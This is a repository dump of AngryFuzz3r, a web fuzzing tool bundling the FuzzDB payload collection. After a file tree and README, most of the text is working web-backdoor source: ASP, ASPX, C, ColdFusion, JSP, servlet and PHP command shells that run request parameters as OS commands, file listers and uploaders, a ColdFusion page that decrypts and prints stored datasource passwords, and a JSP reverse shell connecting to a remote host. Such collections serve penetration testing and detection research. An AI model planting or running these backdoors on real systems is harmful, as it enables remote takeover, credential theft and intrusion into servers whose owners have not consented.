├── README.md ├── angryFuzzer.py ├── fuzzdb ├── README.md ├── _copyright.txt ├── attack │ ├── README.md │ ├── all-attacks │ │ ├── all-attacks-unix.txt │ │ ├── all-attacks-win.txt │ │ └── all-attacks-xplatform.txt │ ├── business-logic │ │ ├── CommonDebugParamNames.txt │ │ ├── CommonMethodNames.txt │ │ └── DebugParams.Json.fuzz.txt │ ├── control-chars │ │ ├── HexValsAllBytes.txt │ │ ├── NullByteRepresentations.txt │ │ ├── imessage.txt │ │ └── terminal-escape-codes.txt │ ├── disclosure-directory │ │ └── directory-indexing-generic.txt │ ├── disclosure-localpaths │ │ └── unix │ │ │ └── common-unix-httpd-log-locations.txt │ ├── disclosure-source │ │ ├── README.md │ │ ├── source-disc-cmd-exec-traversal.txt │ │ ├── source-disclosure-generic.txt │ │ └── source-disclosure-microsoft.txt │ ├── email │ │ ├── invalid-email-addresses.txt │ │ └── valid-email-addresses.txt │ ├── file-upload │ │ ├── README.md │ │ ├── alt-extensions-asp.txt │ │ ├── alt-extensions-coldfusion.txt │ │ ├── alt-extensions-jsp.txt │ │ ├── alt-extensions-perl.txt │ │ ├── alt-extensions-php.txt │ │ ├── file-ul-filter-bypass-commonly-writable-directories.txt │ │ ├── file-ul-filter-bypass-microsoft-asp-filetype-bf.txt │ │ ├── file-ul-filter-bypass-microsoft-asp.txt │ │ ├── file-ul-filter-bypass-ms-php.txt │ │ ├── file-ul-filter-bypass-x-platform-generic.txt │ │ ├── file-ul-filter-bypass-x-platform-php.txt │ │ ├── invalid-filenames-linux.txt │ │ ├── invalid-filenames-microsoft.txt │ │ ├── invalid-filesystem-chars-microsoft.txt │ │ ├── invalid-filesystem-chars-osx.txt │ │ └── malicious-images │ │ │ ├── POC_img_phpinfo-CR.gif │ │ │ ├── POC_img_phpinfo-LF-CR.gif │ │ │ ├── POC_phpinfo-metadata.gif │ │ │ ├── POC_phpinfo-metadata.jpg │ │ │ ├── README.md │ │ │ ├── eicar.com.txt │ │ │ ├── lottapixel.jpg │ │ │ ├── uber.gif │ │ │ └── xssproject.swf │ ├── format-strings │ │ └── format-strings.txt │ ├── html_js_fuzz │ │ ├── HTML5sec_Injections.txt │ │ ├── html_attributes.txt │ │ ├── html_tags.txt │ │ ├── javascript_events.txt │ │ ├── js_inject.txt │ │ └── quotationmarks.txt │ ├── http-protocol │ │ ├── README.md │ │ ├── crlf-injection.txt │ │ ├── docs.http-method-defs.html │ │ ├── hpp.txt │ │ ├── http-header-cache-poison.txt │ │ ├── http-protocol-methods.txt │ │ ├── http-request-header-field-names.txt │ │ ├── http-response-header-field-names.txt │ │ ├── known-uri-types.txt │ │ └── user-agents.txt │ ├── integer-overflow │ │ └── integer-overflows.txt │ ├── ip │ │ └── localhost.txt │ ├── json │ │ └── JSON_Fuzzing.txt │ ├── ldap │ │ ├── README.md │ │ └── ldap-injection.txt │ ├── lfi │ │ ├── JHADDIX_LFI.txt │ │ ├── README.md │ │ ├── common-ms-httpd-log-locations.txt │ │ └── common-unix-httpd-log-locations.txt │ ├── mimetypes │ │ └── MimeTypes.txt │ ├── no-sql-injection │ │ ├── Readme.md │ │ └── mongodb.txt │ ├── os-cmd-execution │ │ ├── Commands-Linux.txt │ │ ├── Commands-OSX.txt │ │ ├── Commands-Windows.txt │ │ ├── Commands-WindowsPowershell.txt │ │ ├── OSCommandInject.Windows.txt │ │ ├── README.md │ │ ├── command-execution-unix.txt │ │ ├── command-injection-template.txt │ │ ├── shell-delimiters.txt │ │ ├── shell-operators.txt │ │ ├── source-disc-cmd-exec-traversal.txt │ │ ├── useful-commands-unix.txt │ │ └── useful-commands-windows.txt │ ├── os-dir-indexing │ │ └── directory-indexing.txt │ ├── path-traversal │ │ ├── README.md │ │ ├── path-traversal-windows.txt │ │ └── traversals-8-deep-exotic-encoding.txt │ ├── redirect │ │ ├── README.md │ │ ├── redirect-injection-template.txt │ │ └── redirect-urls-template.txt │ ├── rfi │ │ ├── README.md │ │ └── rfi.txt │ ├── server-side-include │ │ └── server-side-includes-generic.txt │ ├── sql-injection │ │ ├── detect │ │ │ ├── GenericBlind.txt │ │ │ ├── Generic_SQLI.txt │ │ │ ├── MSSQL.txt │ │ │ ├── MSSQL_blind.txt │ │ │ ├── MySQL.txt │ │ │ ├── MySQL_MSSQL.txt │ │ │ ├── README.md │ │ │ ├── oracle.txt │ │ │ └── xplatform.txt │ │ ├── exploit │ │ │ ├── README.md │ │ │ ├── db2-enumeration.txt │ │ │ ├── ms-sql-enumeration.txt │ │ │ ├── mysql-injection-login-bypass.txt │ │ │ ├── mysql-read-local-files.txt │ │ │ └── postgres-enumeration.txt │ │ └── payloads-sql-blind │ │ │ ├── README.md │ │ │ ├── payloads-sql-blind-MSSQL-INSERT.txt │ │ │ ├── payloads-sql-blind-MSSQL-WHERE.txt │ │ │ ├── payloads-sql-blind-MySQL-INSERT.txt │ │ │ ├── payloads-sql-blind-MySQL-ORDER_BY.txt │ │ │ └── payloads-sql-blind-MySQL-WHERE.txt │ ├── string-expansion │ │ └── shell-expansion.txt │ ├── unicode │ │ ├── README.md │ │ ├── corrupted.txt │ │ ├── emoji.txt │ │ ├── japanese-emoticon.txt │ │ ├── naughty-unicode.txt │ │ ├── regionalindicators.txt │ │ ├── right-to-left.txt │ │ ├── specialchars.txt │ │ ├── two-byte-chars.txt │ │ └── upsidedown.txt │ ├── xml │ │ └── xml-attacks.txt │ ├── xpath │ │ ├── README.md │ │ └── xpath-injection.txt │ └── xss │ │ ├── JHADDIX_XSS_WITH_CONTEXT.doc.txt │ │ ├── README.md │ │ ├── XSSPolyglot.txt │ │ ├── all-encodings-of-lt.txt │ │ ├── default-javascript-event-attributes.txt │ │ ├── html-event-attributes.txt │ │ ├── test.xxe │ │ ├── xss-other.txt │ │ ├── xss-rsnake.txt │ │ └── xss-uri.txt ├── discovery │ ├── UserAgent │ │ ├── UserAgentListCommon.txt │ │ ├── UserAgentListLarge.txt │ │ └── UserAgents.txt │ ├── dns │ │ ├── CcTLD.txt │ │ ├── alexaTop1mAXFRcommonSubdomains.txt │ │ ├── dnsmapCommonSubdomains.txt │ │ └── gTLD.txt │ └── predictable-filepaths │ │ ├── KitchensinkDirectories.txt │ │ ├── Randomfiles.txt │ │ ├── UnixDotfiles.txt │ │ ├── backdoors │ │ ├── ASP_CommonBackdoors.txt │ │ ├── bot_control_panels.txt │ │ └── shells.txt │ │ ├── cgi │ │ ├── CGI_HTTP_POST.txt │ │ ├── CGI_HTTP_POST_Windows.txt │ │ ├── CGI_Microsoft.txt │ │ └── CGI_XPlatform.txt │ │ ├── cms │ │ ├── README.md │ │ ├── drupal_plugins.txt │ │ ├── drupal_themes.txt │ │ ├── joomla_plugins.txt │ │ ├── joomla_themes.txt │ │ ├── php-nuke.txt │ │ ├── wordpress.txt │ │ ├── wp_common_theme_files.txt │ │ ├── wp_plugins.txt │ │ ├── wp_plugins_top225.txt │ │ ├── wp_themes.readme │ │ └── wp_themes.txt │ │ ├── dicc.txt │ │ ├── filename-dirname-bruteforce │ │ ├── 3CharExtBrute.txt │ │ ├── CommonWebExtensions.txt │ │ ├── Extensions.Backup.txt │ │ ├── Extensions.Common.txt │ │ ├── Extensions.Compressed.txt │ │ ├── Extensions.Mostcommon.txt │ │ ├── Extensions.Skipfish.txt │ │ ├── WordlistSkipfish.txt │ │ ├── copy_of.txt │ │ ├── raft-large-directories-lowercase.txt │ │ ├── raft-large-directories.txt │ │ ├── raft-large-extensions-lowercase.txt │ │ ├── raft-large-extensions.txt │ │ ├── raft-large-files-lowercase.txt │ │ ├── raft-large-files.txt │ │ ├── raft-large-words-lowercase.txt │ │ ├── raft-large-words.txt │ │ ├── raft-medium-directories-lowercase.txt │ │ ├── raft-medium-directories.txt │ │ ├── raft-medium-extensions-lowercase.txt │ │ ├── raft-medium-extensions.txt │ │ ├── raft-medium-files-lowercase.txt │ │ ├── raft-medium-files.txt │ │ ├── raft-medium-words-lowercase.txt │ │ ├── raft-medium-words.txt │ │ ├── raft-small-directories-lowercase.txt │ │ ├── raft-small-directories.txt │ │ ├── raft-small-extensions-lowercase.txt │ │ ├── raft-small-extensions.txt │ │ ├── raft-small-files-lowercase.txt │ │ ├── raft-small-files.txt │ │ ├── raft-small-words-lowercase.txt │ │ ├── raft-small-words.txt │ │ ├── spanish.txt │ │ ├── test_demo.txt │ │ └── upload_variants.txt │ │ ├── login-file-locations │ │ ├── Logins.txt │ │ ├── cfm.txt │ │ ├── html.txt │ │ ├── jsp.txt │ │ ├── php.txt │ │ ├── windows-asp.txt │ │ └── windows-aspx.txt │ │ ├── password-file-locations │ │ └── Passwords.txt │ │ ├── php │ │ ├── PHP.txt │ │ └── PHP_CommonBackdoors.txt │ │ ├── proxy-conf.txt │ │ ├── tftp.txt │ │ ├── webservers-appservers │ │ ├── ADFS.txt │ │ ├── AdobeXML.txt │ │ ├── Apache.txt │ │ ├── ApacheTomcat.txt │ │ ├── Apache_Axis.txt │ │ ├── ColdFusion.txt │ │ ├── FatwireCMS.txt │ │ ├── Frontpage.txt │ │ ├── HP_System_Mgmt_Homepage.txt │ │ ├── HTTP_POST_Microsoft.txt │ │ ├── Hyperion.txt │ │ ├── IIS.txt │ │ ├── JBoss.txt │ │ ├── JRun.txt │ │ ├── JavaServlets_Common.txt │ │ ├── Joomla_exploitable.txt │ │ ├── LotusNotes.txt │ │ ├── Netware.txt │ │ ├── Oracle9i.txt │ │ ├── OracleAppServer.txt │ │ ├── README.md │ │ ├── Ruby_Rails.txt │ │ ├── SAP.txt │ │ ├── Sharepoint.txt │ │ ├── SiteMinder.txt │ │ ├── SunAppServerGlassfish.txt │ │ ├── SuniPlanet.txt │ │ ├── Vignette.txt │ │ ├── Weblogic.txt │ │ └── Websphere.txt │ │ └── wellknown-rfc5785.txt ├── docs │ ├── attack-docs │ │ ├── remote-cmd-exfiltration │ │ │ ├── Web-Shells-rev2.pdf │ │ │ ├── netcat_cheat_sheet_v1.pdf │ │ │ └── windows_command_line_sheet_v1.pdf │ │ ├── rfi-cheatsheet.html │ │ ├── source-directory-file-indexing-cheatsheet.html │ │ ├── sqli │ │ │ ├── docs.oracle_cheat.pdf │ │ │ └── docs.sql_injection_cheatsheet.html │ │ ├── waf-bypass │ │ │ └── regexp-security-cheatsheet.md │ │ └── xss │ │ │ └── docs.wasc-scriptmapping │ │ │ ├── ScriptMapping_Release_26Nov2007.html │ │ │ ├── images │ │ │ ├── ff2.png │ │ │ ├── ie7.png │ │ │ └── safari3.png │ │ │ └── license.txt │ └── misc │ │ ├── KL0209LIT_fffap.html │ │ ├── Web-Shells-rev2.pdf │ │ ├── Wireshark_Display_Filters.pdf │ │ └── htmlcodes-cheatsheet.htm ├── regex │ ├── README.md │ ├── amazon.txt │ ├── breakpoint-ignores.txt │ ├── errors.txt │ ├── nsa-wordlist.txt │ ├── pii.readme.txt │ ├── pii.txt │ └── sessionid.txt ├── web-backdoors │ ├── README.md │ ├── asp │ │ ├── cmd-asp-5.1.asp │ │ ├── cmd.asp │ │ ├── cmd.aspx │ │ ├── cmdasp.asp │ │ ├── cmdasp.aspx │ │ ├── dns.asp │ │ ├── file.asp │ │ ├── list.asp │ │ ├── list.txt │ │ ├── ntdaddy.asp │ │ ├── proxy.asp │ │ ├── shell.asp │ │ ├── shell.aspx │ │ └── up.asp │ ├── c │ │ └── cmd.c │ ├── cfm │ │ ├── cfExec.cfm │ │ ├── cfSQL.cfm │ │ ├── cmd.cfm │ │ └── shell.cfm │ ├── exe │ │ └── nc.exe │ ├── jsp │ │ ├── CmdServlet.class │ │ ├── CmdServlet.java │ │ ├── ListServlet.class │ │ ├── ListServlet.java │ │ ├── UpServlet.class │ │ ├── UpServlet.java │ │ ├── browser.jsp │ │ ├── cmd.jsp │ │ ├── cmdjsp.jsp │ │ ├── jsp-reverse.jsp │ │ ├── laudanum │ │ │ ├── cmd.war │ │ │ ├── makewar.sh │ │ │ └── warfiles │ │ │ │ ├── META-INF │ │ │ │ └── MANIFEST.MF │ │ │ │ ├── WEB-INF │ │ │ │ └── web.xml │ │ │ │ └── cmd.jsp │ │ ├── list.jsp │ │ ├── simple.jsp │ │ ├── up.jsp │ │ └── win32 │ │ │ ├── cmd_win32.jsp │ │ │ └── up_win32.jsp │ ├── php │ │ ├── cmd.php │ │ ├── dns.php │ │ ├── file.php │ │ ├── host.php │ │ ├── killnc.php │ │ ├── list.php │ │ ├── php-backdoor.php │ │ ├── php-reverse-shell.php │ │ ├── proxy.php │ │ ├── shell.php │ │ ├── simple-backdoor.php │ │ ├── tiny.php │ │ └── up.php │ ├── pl-cgi │ │ ├── cmd.pl │ │ ├── list.pl │ │ ├── perlcmd.cgi │ │ └── up.pl │ ├── servlet │ │ ├── CmdServlet.java │ │ ├── ListServlet.java │ │ └── UpServlet.java │ ├── sh │ │ ├── cmd.sh │ │ ├── list.sh │ │ └── up.sh │ └── wordpress │ │ ├── laudanum.php │ │ └── templates │ │ ├── README.md │ │ ├── dns.php │ │ ├── file.php │ │ ├── host.php │ │ ├── ipcheck.php │ │ ├── killnc.php │ │ ├── php-reverse-shell.php │ │ ├── proxy.php │ │ ├── settings.php │ │ └── shell.php ├── wordlists-misc │ ├── accidental_profanity.txt │ ├── common-http-ports.txt │ ├── numeric.txt │ ├── us_cities.txt │ ├── wordlist-alphanumeric-case.txt │ ├── wordlist-common-snmp-community-strings.txt │ └── wordlist-dna.txt └── wordlists-user-passwd │ ├── db2 │ ├── db2_default_pass.txt │ ├── db2_default_user.txt │ └── db2_default_userpass.txt │ ├── faithwriters.txt │ ├── generic-listpairs │ ├── http_default_pass.txt │ ├── http_default_userpass.txt │ └── http_default_users.txt │ ├── names │ └── namelist.txt │ ├── oracle │ ├── _hci_oracle_passwords.txt │ ├── _oracle_default_passwords.txt │ ├── oracle_login_password.txt │ ├── oracle_logins.txt │ └── oracle_passwords.txt │ ├── passwds │ ├── john.txt │ ├── phpbb.txt │ ├── twitter.txt │ └── weaksauce.txt │ ├── postgres │ ├── postgres_default_pass.txt │ ├── postgres_default_user.txt │ └── postgres_default_userpass.txt │ ├── readme.txt │ ├── tomcat │ ├── tomcat_mgr_default_pass.txt │ ├── tomcat_mgr_default_userpass.txt │ └── tomcat_mgr_default_users.txt │ └── unix-os │ ├── unix_passwords.txt │ └── unix_users.txt ├── lib ├── __init__.py ├── __init__.pyc ├── colors.py └── colors.pyc └── requirements.txt /README.md: -------------------------------------------------------------------------------- 1 | # AngryFuzz3r 2 |  3 | 4 | Status: **Development** 5 | ## About the AngryFuzz3r project 6 | AngryFuzz3r is a collection of tools for pentesting to gather information and discover vulnerabilities of the targets based on Fuzzedb https://github.com/fuzzdb-project/fuzzdb project 7 | ## UrlFuzz3r->AngryFuzz3r_1 8 | Discover hidden files and directories on a web server. The application tries to find url relative paths of the given website by comparing them with a given set . 9 | 10 | ## Features 11 | 12 | * Fuzz url set from an input file 13 | * Concurrent relative path search 14 | * Configurable number of fuzzing workers 15 | * Fuzz CMS ==> Wordpress,Durpal,Joomla 16 | * Generate reports of the valid paths 17 | ## Usage 18 | 19 | ~~~ 20 | $ python angryFuzzer.py -h 21 | Usage: angryFuzzer.py [options] 22 | 23 | Options: 24 | -h, --help show this help message and exit 25 | -q, --quiet Silent mode ,only reports 26 | -u URL, --url=URL URL of the Target 27 | -c CMS, --cms=CMS scan CMS ==> wp ,dp 28 | -w WORDLIST, --wordlist=WORDLIST 29 | Custom wordlist 30 | 31 | ~~~ 32 | 33 | Example: 34 | * Fuzzing an url with default dictionary 35 | ~~~ 36 | python angryFuzzer.py -u http://127.0.0.1 37 | ~~~ 38 | 39 | * Fuzzing CMS (wp: in this exemple !) 40 | ~~~ 41 | python angryFuzzer.py -u http://127.0.0.1 --cms wp 42 | ~~~ 43 | 44 | * Fuzzing a custom Wordlist 45 | ~~~ 46 | python angryFuzzer.py -u http://127.0.0.1 -w fuzzdb/discovery/predictable-filepaths/php/PHP.txt 47 | ~~~ 48 |  49 | 50 | 51 | 52 | ## How to install 53 | ##### Clone 54 | - Clone the repository with: 55 | ```sh 56 | $ git clone https://github.com/ihebski/angryFuzzer.git 57 | $ cd angryFuzzer 58 | $ python angryFuzzer.py 59 | ``` 60 | ##### Dependencies 61 | * Install the required dependencies with: 62 | ```bash 63 | $ sudo pip install -r requirements.txt 64 | ``` 65 | ## License 66 | The MIT License (MIT) 67 | -------------------------------------------------------------------------------- /fuzzdb/attack/README.md: -------------------------------------------------------------------------------- 1 |
29 | Machine: <%=oSNet.ComputerName%>32 |
30 | Username: <%=oSNet.UserName%>
31 | <% 32 | If (IsObject(oF)) Then 33 | On Error Resume Next 34 | Response.Write Server.HTMLEncode(oF.ReadAll) 35 | oF.Close 36 | Call oS.Run("win.com cmd.exe /c del "& szTF,0,True) 37 | End If 38 | 39 | %> 40 | 41 | 42 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/asp/cmd.asp: -------------------------------------------------------------------------------- 1 | 11 | 12 | <% 13 | Set oScript = Server.CreateObject("WSCRIPT.SHELL") 14 | Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 15 | Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 16 | 17 | szCMD = request("cmd") 18 | 19 | If (szCMD <> "") Then 20 | szTempFile = "C:\" & oFileSys.GetTempName( ) 21 | Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 22 | Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) 23 | End If 24 | %> 25 | 26 | 27 | 28 |
33 | <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %> 34 |36 | 37 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/asp/cmdasp.asp: -------------------------------------------------------------------------------- 1 | <%@ Language=VBScript %> 2 | <% 3 | ' --------------------o0o-------------------- 4 | ' File: CmdAsp.asp 5 | ' Author: Maceo
35 | <% 36 | If (IsObject(oFile)) Then 37 | On Error Resume Next 38 | Response.Write Server.HTMLEncode(oFile.ReadAll) 39 | oFile.Close 40 | Call oFileSys.DeleteFile(szTempFile, True) 41 | End If 42 | %> 43 | 44 | 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/asp/cmd.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="VB" Debug="true" %> 2 | <%@ import Namespace="system.IO" %> 3 | <%@ import Namespace="System.Diagnostics" %> 4 | 5 | 25 | 26 | 27 | 28 |
41 | <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %> 42 |38 | 39 | 40 | 41 | 42 | 43 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/asp/list.asp: -------------------------------------------------------------------------------- 1 | 11 | 12 | 13 | 14 | 15 | <% 16 | 17 | file=request("file") 18 | tipo=request("type") 19 | 20 | If file="" then 21 | file="c:\" 22 | tipo="1" 23 | End If 24 | 25 | %> 26 | 27 | 28 | 33 | 34 | 35 | <% 36 | 37 | If tipo="1" then 38 | Response.Write("
43 | <% 44 | If (IsObject(oFile)) Then 45 | ' -- Read the output from our command and remove the temp file -- ' 46 | On Error Resume Next 47 | Response.Write Server.HTMLEncode(oFile.ReadAll) 48 | oFile.Close 49 | Call oFileSys.DeleteFile(szTempFile, True) 50 | End If 51 | %> 52 | 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/asp/cmdasp.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#" Debug="true" Trace="false" %> 2 | <%@ Import Namespace="System.Diagnostics" %> 3 | <%@ Import Namespace="System.IO" %> 4 | 28 | 29 | 30 |awen asp.net webshell 31 | 32 | 33 |
--") 53 | 54 | End If 55 | %> 56 | 57 | <% 58 | 59 | sub ListFolder(path) 60 | 61 | set fs = CreateObject("Scripting.FileSystemObject") 62 | set folder = fs.GetFolder(path) 63 | 64 | Response.Write("
") 49 | 50 | Response.Write(oFich.ReadAll) 51 | 52 | Response.Write("
--
--") 53 | 54 | End If 55 | %> 56 | 57 | <% 58 | 59 | sub ListFolder(path) 60 | 61 | set fs = CreateObject("Scripting.FileSystemObject") 62 | set folder = fs.GetFolder(path) 63 | 64 | Response.Write("
") 49 | 50 | Response.Write(oFich.ReadAll) 51 | 52 | Response.Write("
--
COMMAND: %s
\n", cmd); 66 | fflush(stdout); 67 | execl("/bin/sh", "/bin/sh", "-c", cmd, 0); 68 | } 69 | 70 | } 71 | 72 | 73 | 74 | 75 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/cfm/cfExec.cfm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Notes:
7 |
12 |
13 |
15 |
24 |
25 |
26 |
27 |
35 | #HTMLCodeFormat(myVar)#
36 |
37 |
Datasource Credentials:
");
47 | writeoutput("");
48 | // Loop Through DataSources
49 | for(i in dataSourceObb) {
50 | if(len(dataSourceObb[i]["password"])){
51 |
52 | // Get url
53 | theurl=(dataSourceObb[i]["url"]);
54 |
55 | // Get username
56 | username=(dataSourceObb[i]["username"]);
57 |
58 | // Get and decrypt password
59 | decryptPassword=Decrypt(dataSourceObb[i]["password"],
60 | generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"), "DESede",
61 | "Base64");
62 |
63 | // Output datasource usernames, passwords, and urls
64 | writeoutput("" &
65 | "
");
69 | }
70 | }
71 | writeoutput("DataSource: " & i & " " &
66 | "Username: " & username & " " &
67 | "Password: " & decryptPassword &
68 | " URL: " & theurl & "
");
72 |
Notes:
10 |28 | #myVar# 29 |30 |
Command: " + req.getParameter("cmd") + "\n
\n"); 27 | Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd")); 28 | DataInputStream procIn = new DataInputStream(p.getInputStream()); 29 | int c='\0'; 30 | while ((c=procIn.read()) != -1) { 31 | out.print((char)c); 32 | } 33 | } 34 | 35 | out.print("\n"); 36 | out.print(""); 37 | } 38 | 39 | public String getServletInfo() { 40 | return "CmdServlet 0.1"; 41 | } 42 | 43 | } 44 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/jsp/ListServlet.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/web-backdoors/jsp/ListServlet.class -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/jsp/ListServlet.java: -------------------------------------------------------------------------------- 1 | /* 2 | * ListServlet.java 3 | * 4 | * @author Sierra 5 | * @version 0.1 6 | */ 7 | 8 | import java.io.*; 9 | import javax.servlet.ServletException; 10 | import javax.servlet.http.*; 11 | 12 | public class ListServlet extends HttpServlet 13 | { 14 | 15 | 16 | public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { 17 | PrintWriter printwriter = res.getWriter(); 18 | String path = req.getParameter("file"); 19 | 20 | printwriter.write("\n\n
\n"); 24 | 25 | File file = new File(path); 26 | 27 | if(file.isDirectory()) 28 | { 29 | String s = new String("Unknown"); 30 | String s2 = new String("Black"); 31 | File afile[] = file.listFiles(); 32 | for(int i = 0; i < afile.length; i++) 33 | { 34 | String s1 = new String(afile[i].toString()); 35 | printwriter.write("("); 36 | String s3; 37 | if(afile[i].isDirectory()) 38 | { 39 | printwriter.write("d"); 40 | s1 = s1 + "/"; 41 | s3 = new String("Blue"); 42 | } else 43 | if(afile[i].isFile()) 44 | { 45 | printwriter.write("-"); 46 | s3 = new String("Green"); 47 | } else 48 | { 49 | printwriter.write("?"); 50 | s3 = new String("Red"); 51 | } 52 | if(afile[i].canRead()) 53 | printwriter.write("r"); 54 | else 55 | printwriter.write("-"); 56 | if(afile[i].canWrite()) 57 | printwriter.write("w"); 58 | else 59 | printwriter.write("-"); 60 | printwriter.write(") " + s1.toString() + " " + "( Size: " + afile[i].length() + " bytes )"); 64 | } else 65 | if(file.canRead()) 66 | { 67 | FileInputStream fileinputstream = new FileInputStream(file); 68 | int j = 0; 69 | while(j >= 0) 70 | { 71 | j = fileinputstream.read(); 72 | printwriter.write(j); 73 | } 74 | fileinputstream.close(); 75 | } else 76 | { 77 | printwriter.write("Can't Read file
\n"); 61 | } 62 | 63 | printwriter.write("
"); 37 | 38 | while((c=post.read()) != -1 && c != '\r' && c != '\n') { 39 | tag=tag.concat("" + (char)c); 40 | contador++; 41 | } 42 | 43 | for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++; 44 | 45 | // out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n"); 46 | // out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>"); 47 | 48 | // (!) Uploaded File Name 49 | 50 | File newfile = new File("c:\\install.log"); 51 | 52 | ///////////////////////// 53 | 54 | FileOutputStream fileout = new FileOutputStream(newfile); 55 | 56 | for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) { 57 | c=post.read(); 58 | fileout.write((char)c); 59 | } 60 | 61 | fileout.close(); 62 | out.print("<== OK"); 63 | 64 | } 65 | 66 | 67 | public String getServletInfo() { 68 | return "UpServlet 0.1"; 69 | } 70 | 71 | } -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/jsp/cmd.jsp: -------------------------------------------------------------------------------- 1 | <%@ page import="java.util.*,java.io.*"%> 2 | <% 3 | // 4 | // JSP_KIT 5 | // 6 | // cmd.jsp = Command Execution (unix) 7 | // 8 | // by: Unknown 9 | // modified: 27/06/2003 10 | // 11 | %> 12 | 13 |17 |
18 | <% 19 | if (request.getParameter("cmd") != null) { 20 | out.println("Command: " + request.getParameter("cmd") + "33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/jsp/cmdjsp.jsp: -------------------------------------------------------------------------------- 1 | // note that linux = cmd and windows = "cmd.exe /c + cmd" 2 | 3 | 7 | 8 | <%@ page import="java.io.*" %> 9 | <% 10 | String cmd = request.getParameter("cmd"); 11 | String output = ""; 12 | 13 | if(cmd != null) { 14 | String s = null; 15 | try { 16 | Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd); 17 | BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); 18 | while((s = sI.readLine()) != null) { 19 | output += s; 20 | } 21 | } 22 | catch(IOException e) { 23 | e.printStackTrace(); 24 | } 25 | } 26 | %> 27 | 28 |
"); 21 | Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); 22 | OutputStream os = p.getOutputStream(); 23 | InputStream in = p.getInputStream(); 24 | DataInputStream dis = new DataInputStream(in); 25 | String disr = dis.readLine(); 26 | while ( disr != null ) { 27 | out.println(disr); 28 | disr = dis.readLine(); 29 | } 30 | } 31 | %> 32 |
29 | <%=output %> 30 |31 | 32 | 33 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/jsp/jsp-reverse.jsp: -------------------------------------------------------------------------------- 1 | // backdoor.jsp 2 | // http://www.security.org.sg/code/jspreverse.html 3 | 4 | <%@ 5 | page import="java.lang.*, java.util.*, java.io.*, java.net.*" 6 | % > 7 | <%! 8 | static class StreamConnector extends Thread 9 | { 10 | InputStream is; 11 | OutputStream os; 12 | 13 | StreamConnector(InputStream is, OutputStream os) 14 | { 15 | this.is = is; 16 | this.os = os; 17 | } 18 | 19 | public void run() 20 | { 21 | BufferedReader isr = null; 22 | BufferedWriter osw = null; 23 | 24 | try 25 | { 26 | isr = new BufferedReader(new InputStreamReader(is)); 27 | osw = new BufferedWriter(new OutputStreamWriter(os)); 28 | 29 | char buffer[] = new char[8192]; 30 | int lenRead; 31 | 32 | while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0) 33 | { 34 | osw.write(buffer, 0, lenRead); 35 | osw.flush(); 36 | } 37 | } 38 | catch (Exception ioe) 39 | 40 | try 41 | { 42 | if(isr != null) isr.close(); 43 | if(osw != null) osw.close(); 44 | } 45 | catch (Exception ioe) 46 | } 47 | } 48 | %> 49 | 50 |
60 |
20 | <% 21 | if (request.getParameter("cmd") != null) { 22 | out.println("Command: " + request.getParameter("cmd") + "35 |
"); 23 | Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); 24 | OutputStream os = p.getOutputStream(); 25 | InputStream in = p.getInputStream(); 26 | DataInputStream dis = new DataInputStream(in); 27 | String disr = dis.readLine(); 28 | while ( disr != null ) { 29 | out.println(disr); 30 | disr = dis.readLine(); 31 | } 32 | } 33 | %> 34 |
18 | <% 19 | if (request.getParameter("cmd") != null) { 20 | out.println("Command: " + request.getParameter("cmd") + "\n31 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/php/cmd.php: -------------------------------------------------------------------------------- 1 | 2 | // 3 | // PHP_KIT 4 | // 5 | // cmd.php = Command Execution 6 | // 7 | // by: The Dark Raver 8 | // modified: 21/01/2004 9 | // 10 | ?> 11 | 12 | 16 |
"); 21 | Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd")); 22 | OutputStream os = p.getOutputStream(); 23 | InputStream in = p.getInputStream(); 24 | DataInputStream dis = new DataInputStream(in); 25 | String disr = dis.readLine(); 26 | while ( disr != null ) { 27 | out.println(disr); disr = dis.readLine(); } 28 | } 29 | %> 30 |
